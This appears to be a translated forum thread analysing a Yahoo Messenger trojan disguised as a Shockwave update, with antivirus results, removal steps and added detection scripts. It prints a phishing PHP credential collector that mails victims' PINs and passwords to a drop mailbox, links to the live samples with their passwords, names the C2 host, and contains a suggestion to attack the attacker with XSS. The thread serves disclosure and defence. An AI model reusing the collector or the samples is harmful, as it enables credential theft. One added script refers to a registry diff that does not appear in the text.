begood

Another Yahoo virus


It passes itself off as an Adobe Shockwave Player update.

Cloud Antivirus detected it immediately.

VirusTotal analysis:

http://www.virustotal.com/analisis/c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5-1265013900

 File setup.exe received on 2010.02.01 08:45:00 (UTC)
Current status: finished
Result: 23/40 (57.50%)
Antivirus Version Last Update Result
a-squared 4.5.0.50 2010.02.01 Dialer!IK
AhnLab-V3 5.0.0.2 2010.01.31 Win-Trojan/Mdshell.3016192
AntiVir 7.9.1.154 2010.01.31 DIAL/Generic
Antiy-AVL 2.0.3.7 2010.02.01 -
Authentium 5.2.0.5 2010.01.31 W32/Trojan-Gypikon-based.DE!Maximus
Avast 4.8.1351.0 2010.01.31 Win32:Malware-gen
AVG 9.0.0.730 2010.01.31 -
BitDefender 7.2 2010.02.01 Win32.Worm.IM.J
CAT-QuickHeal 10.00 2010.02.01 -
ClamAV 0.96.0.0-git 2010.02.01 -
Comodo 3780 2010.02.01 Heur.Suspicious
DrWeb 5.0.1.12222 2010.02.01 -
eSafe 7.0.17.0 2010.01.31 Win32.DIALGeneric
eTrust-Vet 35.2.7274 2010.02.01 Win32/Tnega.ADE
F-Prot 4.5.1.85 2010.01.31 W32/Trojan-Gypikon-based.DE!Maximus
F-Secure 9.0.15370.0 2010.01.31 Win32.Worm.IM.J
Fortinet 4.0.14.0 2010.02.01 W32/Delf.TUP!tr
GData 19 2010.02.01 Win32.Worm.IM.J
Ikarus T3.1.1.80.0 2010.02.01 Dialer
Jiangmin 13.0.900 2010.01.28 -
K7AntiVirus 7.10.960 2010.01.29 -
Kaspersky 7.0.0.125 2010.02.01 Trojan.Win32.Agent2.cnkw
McAfee 5878 2010.01.31 Generic.dx!mgr
McAfee+Artemis 5878 2010.01.31 Artemis!FA8305E3E69B
McAfee-GW-Edition 6.8.5 2010.02.01 Dialer.Generic
Microsoft 1.5406 2010.02.01 -
NOD32 4823 2010.02.01 -
Norman 6.04.03 2010.01.31 -
nProtect 2009.1.8.0 2010.02.01 -
Panda 10.0.2.2 2010.01.31 Trj/CI.A
PCTools 7.0.3.5 2010.02.01 Trojan-PSW.Bancos
Rising 22.33.00.04 2010.02.01 -
Sophos 4.50.0 2010.02.01 Mal/Generic-A
Sunbelt 3.2.1858.2 2010.01.31 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.02.01 Infostealer.Bancos
TheHacker 6.5.1.0.175 2010.02.01 -
TrendMicro 9.120.0.1004 2010.02.01 -
VBA32 3.12.12.1 2010.01.29 -
ViRobot 2010.2.1.2165 2010.02.01 -
VirusBuster 5.0.21.0 2010.01.31 -
Additional information
File size: 3016192 bytes
MD5 : fa8305e3e69b27a7b95dcf2cec0fcb9f
SHA1 : a4552f2899871702f83969ba01ce50228ab8c6fd
SHA256: c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5

original download page:

http://dl.fisier.ro/files/dh5kgfingf335je/setup.exe.html

mirror:

http://www.2shared.com/file/11045927/5afa1303/setup_virus.html

password:

begood@rstcenter.com

the page you receive through Yahoo IM:

http://roamateursxx.freehostking.com/profile.php?user=[your ID]

mirror of this page:

http://www.2shared.com/file/11045982/d07f0f06/virus_downloadpage.html

same password.

the message I received through Y! IM:

did you make this profile? http://roamateursxx.freehostking.com/profile.php?user=me

Later edit: I like how the attackers thought this through.

They send a link to a porn profile that is not displayed correctly to the victim. Because it affects them directly (the victim's ID being in the link), they have to install that "update" to see their own profile. Voilà, new trojan installed.


Thanks.

The virus copies itself to Windows/system32/cgsb.exe and sets itself to run at startup in ( HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ). Its icon is the Internet Explorer one.

To get rid of it, delete that file. Strangely, in the startup entry the execution path appears with a comma in front of it.

When run it shows an ugly ProgressBar, and at the end it gives an error: "Unable to Register ActiveX...".

I think it uses OpenSSL; it copies libeay32.dll and ssleay32.dll into system32. I'm not sure. I think that "setup", which is probably a binder written in Delphi, contains 5 files. It also copies YahooAuth2.dll ( Bricksoft, not Yahoo!, as Company Name, odd ). And I think there is also MSIMTF.DLL ( Microsoft ).

EDIT: On the second run, it copied itself under the name xdbyqdn.exe. That means the name is random, or it may have a certain number of possible names.

TO GET RID OF IT: Go into Windows\system32 and delete the executable(s) with the INTERNET EXPLORER ( 6 ) icon.

I'll be back with more details.

Edited by Nytro

"reading like a wolf"

x (2/1/2010 2:30:58 PM): Georgiana: did you make this profile? hxxp://roamateursxx.freehostking.com/profile.php?user=his id

x: what did you say, that you're tricking me

x: and I install that, right?

x: )


x: and 2, look, what you're doing isn't nice

x: then you wonder why people beat you up )

x (2/1/2010 2:31:06 PM): is there any point in also telling her she has a small brain?

Flubber (2/1/2010 2:31:11 PM): http://rstcenter.com/forum/19709-inca-un-virus-yahoo.rst

Flubber (2/1/2010 2:31:13 PM): I was just reading it


Google Safe Browsing: Report a Malware Page

everyone report it here.

this one: http://roamateursxx.freehostking.com/

Later edit: Anubis analysis:

http://anubis.iseclab.org/?action=result&task_id=19351d648dd9e1984d109350b9a0ca423

Nytro, you missed that it also creates a fourth file:

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

http://www.threatexpert.com/report.aspx?md5=fa8305e3e69b27a7b95dcf2cec0fcb9f

so it has both a keylogger and a stealer :)

be very careful, readers!


It reads:

HKCU\Software\Yahoo\pager\Yahoo! User ID

HKCU\Software\Yahoo\pager\ETS

HKCU\Software\Yahoo\pager\Save Password

It steals the Messenger password. It copies the ID and password into:

HKLM\SOFTWARE\first\USER

HKLM\SOFTWARE\first\PAROLA

It's badly written; it reads Yahoo! User ID so often it's absurd... It keeps reading it until it is filled in. It reads the data like a keylogger, according to how the keys are pressed; it probably checks the active window.

Let me see what else I can find out...

Edited by Nytro

Probably another version.. it copies itself under the name ("efoqj.exe")

I cursed at a girl for half a day 4 days ago when I got it :)) I thought it was a trojan,

then I saw she sent the same message again and I realised she had nothing to do with it...

the link I received... the first time, by the next day it no longer worked,

001Webs.com Free Hosting | 404, Page Doesn't Exist!

the link to the executable file... still works (I couldn't be bothered to report the page on lx.ro, do it if you want...)

http://profilexx.haos.ro/update.exe

Virus Total

Virustotal. MD5: 16c71403492c440996722d1d0af8f25a Infostealer.Bancos Dialer.Generic Worm.Agent.AJ

Anubis

Anubis: Analyzing Unknown Binaries

System snapshots after running update.exe:



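The one line in that diff that matters for cleanup is the Winlogon\Shell change: the dropper appended C:\WINDOWS\system32\efoqj.exe to the shell value, so Winlogon launches it next to Explorer at every logon; the Perflib, RNG seed and Fusion entries around it are normal system noise. As an added example (not part of the original post), the Python below parses lines in this log's "Reg Val Changed" format and reports changes to auto-start locations, diffing the old and new data so only the injected entry is shown. The four sample lines are copied from the diff above; the parser and the list of persistence keys are mine and the list is not exhaustive.

```python
"""Flag auto-start (persistence) changes in a registry-diff log.

Added example, not from the original post: the parser and the key list are
mine; the four SAMPLE_LOG lines are copied from the diff in the thread.
Only 'Reg Val Changed' lines are parsed, since that is the format shown.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Reg Val Changed <key\value> "<new data>" (old value="<old data>")
CHANGED_RE = re.compile(
    r'^Reg Val Changed (?P<path>.*?) "(?P<new>.*)" \(old value="(?P<old>.*)"\)$'
)

# Registry locations Windows reads to start programs at logon/boot (my list,
# not exhaustive). Matched case-insensitively against the full key\value path.
PERSISTENCE_PATTERNS = [
    re.compile(r"\\winlogon\\(shell|userinit|taskman)$", re.I),
    re.compile(r"\\currentversion\\run(once|services)?(ex)?\\", re.I),
    re.compile(r"\\currentversion\\windows\\(appinit_dlls|load|run)$", re.I),
    re.compile(r"\\services\\[^\\]+\\imagepath$", re.I),
]

# Lines copied from the sandbox diff above (one persistence hit, three noise).
SAMPLE_LOG = r"""
Reg Val Changed HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed "BINARY SIZE=80 MD5=0ABF1D074E505CE9E52F8BD027337E03" (old value="BINARY SIZE=80 MD5=DAD86B2FE383EA7978D57922BD8A402D")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter "4088" (old value="4074")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell "Explorer.exe ,C:\WINDOWS\system32\efoqj.exe" (old value="Explorer.exe")
Reg Key Deleted HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d
""".strip().splitlines()


@dataclass
class Finding:
    path: str            # full key\value path that changed
    new: str             # new data as logged
    old: str             # previous data as logged
    added: List[str] = field(default_factory=list)  # entries present only in new


def _entries(value: str) -> List[str]:
    """Split a comma-separated auto-start value ('Explorer.exe ,C:\\x.exe')."""
    return [e.strip() for e in value.split(",") if e.strip()]


def find_persistence(lines: Iterable[str]) -> List[Finding]:
    """Return changes to auto-start keys, with the entries the change injected."""
    findings: List[Finding] = []
    for line in lines:
        m = CHANGED_RE.match(line.strip())
        if not m:
            continue  # 'Reg Key Deleted' etc. carry no new data to inspect
        path, new, old = m.group("path"), m.group("new"), m.group("old")
        if not any(p.search(path) for p in PERSISTENCE_PATTERNS):
            continue  # Perflib counters, RNG seed and similar noise
        old_set = {e.lower() for e in _entries(old)}
        added = [e for e in _entries(new) if e.lower() not in old_set]
        findings.append(Finding(path, new, old, added))
    return findings


if __name__ == "__main__":
    for f in find_persistence(SAMPLE_LOG):
        print(f"{f.path}\n  old: {f.old!r}\n  new: {f.new!r}")
        for exe in f.added:
            print(f"  injected: {exe}")
```

Run against the full diff it reports exactly one hit, the Shell value, with the single injected path; that path is what has to be removed from the value (and from disk) before the machine is clean, which is why the later posts about hunting for an executable with the wrong icon are chasing the right thing.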

What I found on the page tdxev pointed to, hxxp://profilexx.haos.ro:

A file named <gohi.php> that contains:


<?php
// Credential collector found on the server (posted as found; comments added).
// Joins the submitted form fields into one line:
// name, PIN, company, city, region, username, password.
$val = $_POST['nume'] . " " . $_POST['PIN'] . " " . $_POST['comp'] . " "
     . $_POST['oras'] . " " . $_POST['reg'] . " " . $_POST['user'] . " " . $_POST['pass'];

// Drop address: the harvested fields are mailed to this Yahoo mailbox.
$to      = "alinuzza235@yahoo.com";
// The subject carries the victim's IP so each mail can be tied to a host.
$subject = "From ip: " . getenv("REMOTE_ADDR");
// Forged sender ("fraier" is Romanian for "sucker").
$email   = "fraier@tds.com";
$message = $val;
$headers = "From: $email";
$sent    = mail($to, $subject, $message, $headers);
if ($sent) {
    // Shown to the victim: "Access the BT24 application again to authenticate."
    print "Accesati din nou aplicatia BT24 pentru autentificare.";
} else {
    print "ERROR";
}
?>

The server probably sends a request to this and he receives the logs at <alinuzza235@yahoo.com>.

Also found there:

hxxp://profilexx.haos.ro/server.exe

hxxp://profilexx.haos.ro/profile.php

hxxp://profilexx.haos.ro/index.htm (identical to profile.php)


I can't manage to delete it. No executable with the Explorer icon shows up for me. Any other methods?

Not the Explorer icon, the Internet Explorer one.

Check whether your files are hidden. Tools -> Folder Options... -> the "View" tab -> enable "Show hidden files and folders" and disable the next two options.

Mirror for the second version:

http://www.2shared.com/file/11056545/c461aa93/update_virus.html

password: rstcenter.com


Of the DLLs Nytro mentioned I only have MSIMTF.DLL. I made the Folder Options changes and still no Internet Explorer icon shows up. NOD32 didn't detect anything. Still, I visited that site about 2 times.

You have to download and run the file from there, otherwise nothing can happen.

I ran the file ROFL found at "hxxp://profilexx.haos.ro/server.exe" and it seems to be a Bifrost server; it tries to connect to 79.117.170.57:81. The IP belongs to RDS and didn't respond to ping; it uses DNS and has probably changed the IP in the meantime.

DNS used: "pariuri.no-ip.biz"

Someone who knows better should study it.

http://profiles.yahoo.com/alinuzza235 => Alina - Member Since: 01/22/2010

A bit of XSS on that mail address wouldn't hurt... although I don't think you have much of a chance... the guy knows what he's doing.

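Matching on the IP alone will miss this: the controller is reached through a dynamic-DNS name, so the hostname, and the DDNS zone it lives in, is the more durable indicator, and the port 81 socket is only useful while the IP is current. As an added example, not from the original post, the Python below checks `netstat -ano` output for the reported socket and a DNS query log for the reported hostname or for any name under a free dynamic-DNS zone. Only the two IOCs come from the post; the netstat rows, the DNS-log layout and the suffix list are constructed samples I wrote, and the suffix list is partial.

```python
"""Check host artefacts for the Bifrost C2 indicators reported in the thread.

Added example, not from the original post. Only the two IOCs come from the
post; the netstat output, the DNS-log layout and the dynamic-DNS suffix list
are constructed by me for illustration.
"""
import re
from typing import Dict, List, Set, Tuple

C2_HOSTS: Set[str] = {"pariuri.no-ip.biz"}                 # DDNS name from the post
C2_SOCKETS: Set[Tuple[str, int]] = {("79.117.170.57", 81)}  # IP:port from the post

# Free dynamic-DNS zones commonly used for RAT controllers (partial list, mine).
DDNS_SUFFIXES = ("no-ip.biz", "no-ip.org", "no-ip.info", "zapto.org", "hopto.org",
                 "ddns.net", "dyndns.org", "sytes.net", "serveftp.com")

# Windows `netstat -ano` row: Proto Local Foreign [State] PID
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")
# Constructed DNS-log layout: "... query <name> <type>"
DNS_QUERY_RE = re.compile(r"\bquery (\S+) ")

# Constructed sample: one row to the reported socket, one benign, one UDP listener.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.20:1059      79.117.170.57:81       SYN_SENT        1832
  TCP    192.168.1.20:1043      192.0.2.10:5050        ESTABLISHED     980
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed sample: the reported name, a benign name, another DDNS host.
SAMPLE_DNS_LOG = """\
2010-02-01 10:12:03 client 192.168.1.20 query pariuri.no-ip.biz A
2010-02-01 10:12:05 client 192.168.1.20 query www.adobe.com A
2010-02-01 10:12:09 client 192.168.1.21 query box7.zapto.org A
"""


def is_dynamic_dns(hostname: str) -> bool:
    """True if hostname is a DDNS zone apex or lives under one (label-aligned)."""
    host = hostname.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DDNS_SUFFIXES)


def c2_connections(netstat_output: str) -> List[Dict[str, str]]:
    """Rows of netstat output whose remote socket is a known C2 endpoint."""
    hits: List[Dict[str, str]] = []
    for line in netstat_output.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # banner and header rows
        proto, _local, foreign, state, pid = m.groups()
        ip, _, port = foreign.rpartition(":")  # UDP '*:*' yields a non-digit port
        if port.isdigit() and (ip, int(port)) in C2_SOCKETS:
            hits.append({"proto": proto, "remote": foreign,
                         "state": state or "", "pid": pid})
    return hits


def suspicious_queries(dns_log: str) -> List[Tuple[str, str]]:
    """(name, reason) for queries to the C2 name or to any dynamic-DNS zone."""
    out: List[Tuple[str, str]] = []
    for line in dns_log.splitlines():
        m = DNS_QUERY_RE.search(line)
        if not m:
            continue
        name = m.group(1).lower().rstrip(".")
        if name in C2_HOSTS:
            out.append((name, "known C2 hostname"))
        elif is_dynamic_dns(name):
            out.append((name, "dynamic DNS zone"))
    return out


if __name__ == "__main__":
    for h in c2_connections(SAMPLE_NETSTAT):
        print(f"C2 socket: PID {h['pid']} {h['proto']} -> {h['remote']} ({h['state']})")
    for name, why in suspicious_queries(SAMPLE_DNS_LOG):
        print(f"DNS: {name} ({why})")
```

The PID from the netstat hit is what ties the connection back to the dropped executable; the DDNS heuristic is noisy on its own (legitimate home servers use the same zones), so treat it as a lead to triage rather than a verdict.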

I got this virus too.

I scanned with NOD32; an infected file showed up in Adobe Shockwave, which it deleted after the scan. I looked for it now in the logs but couldn't find it.

I searched system32 for IE icons but didn't find any.

I scanned these files with VirusTotal, only yahooauth2.dll being infected; NOD32 found it clean.

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

How can I find out whether I'm still infected?

later:

Here you will find more information on removing the virus; I used the first method and I can say that for now the virus is gone.

Edited by FlaVirus